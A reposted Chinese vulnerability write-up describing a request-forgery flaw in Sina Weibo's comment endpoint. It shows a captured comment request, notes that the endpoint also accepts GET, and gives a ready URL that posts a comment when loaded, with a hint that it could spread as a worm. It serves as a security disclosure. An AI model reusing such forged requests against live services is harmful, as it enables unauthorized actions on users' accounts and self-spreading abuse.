鸿 网 互 联 www.68idc.cn

新浪微博某功能控制不严可导致蠕虫

来源:互联网 作者:佚名 时间:2016-05-07 10:05
1)存在问题的功能在:lady.weibo.com的评论处; 2)点击发布并抓包,得到如下数据; POST /cmnt/submit HTTP/1.1 Host: comment5.news.sina.com.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0 Accept: text/html,appli
1)存在问题的功能在:lady.weibo.com的评论处;
 
 
2)点击发布并抓包,得到如下数据;
 
 
POST /cmnt/submit HTTP/1.1
Host: comment5.news.sina.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://slide.eladies.sina.com.cn/fa/slide_3_41261_19668.html
Cookie: 
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 292
 
channel=shuo&newsid=slidenews-41261-277122&parent=B&content=very+nice&format=js&ispost=1&share_url=http%3A%2F%2Fslide.eladies.sina.com.cn%2Ffa%2Fslide_3_41261_19668.html%3Fimg%3D277122&video_url=&img_url=http%3A%2F%2Fwww.sinaimg.cn%2Fdy%2Fslidenews%2F3_img%2F2013_15%2F41261_277122_505214.jpg
 
3)系统校验了referer,但是发现居然可以直接发送GET请求;
 
 
http://comment5.news.sina.com.cn/cmnt/submit?channel=shuo&newsid=slidenews-41261-277122&parent=B&content=very+nice&format=js&ispost=1&share_url=http%3A%2F%2Fslide.eladies.sina.com.cn%2Ffa%2Fslide_3_41261_19668.html%3Fimg%3D277122&video_url=&img_url=http%3A%2F%2Fwww.sinaimg.cn%2Fdy%2Fslidenews%2F3_img%2F2013_15%2F41261_277122_505214.jpg
 
4)提交效果见下图;
 
 
 
5)在weibo发布上面的url请求,发现系统对GET请求也校验了referer;
 
 
6)但是我们可以将url发布在如下场景;
 
7)效果如下图,另外“share_url”和“image_url”参数貌似能够自己定义....
 

网友评论
<